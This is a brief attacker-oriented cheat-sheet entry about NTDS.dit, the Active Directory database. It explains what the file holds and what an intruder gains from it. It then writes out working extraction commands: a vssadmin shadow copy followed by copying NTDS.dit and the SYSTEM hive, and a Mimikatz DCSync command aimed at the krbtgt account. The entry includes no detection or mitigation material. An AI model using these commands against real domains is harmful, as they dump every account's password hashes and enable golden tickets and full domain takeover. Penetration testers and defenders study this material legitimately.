1- NTDS.dit (AD Database)

What it is:

The core Active Directory database file on a Domain Controller.

Location:

C:\\Windows\\NTDS\\NTDS.dit (plus associated EDB log files).

Contains:

• All domain objects: users, groups, computers, OUs
• Every user’s password hashes (including the krbtgt account)
• Group memberships, ACLs, and schema

Attacker gains:

• Full domain credential dump: NTLM hashes (and Kerberos key material) for all domain accounts
• Basis for offline cracking, Pass‑the‑Hash, Golden Ticket creation

Extraction methods:

1. Volume Shadow Copy + file copy

   vssadmin create shadow /for=C:
   copy \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopyX\\\\Windows\\\\NTDS\\\\NTDS.dit C:\\temp\\
   copy \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopyX\\\\Windows\\\\System32\\\\Config\\\\SYSTEM C:\\temp\\
   

2. DCSync (remote)

   mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
   

Example tool/attack:

• Mimikatz DCSync
• Impacket secretsdump.py (ntds mode)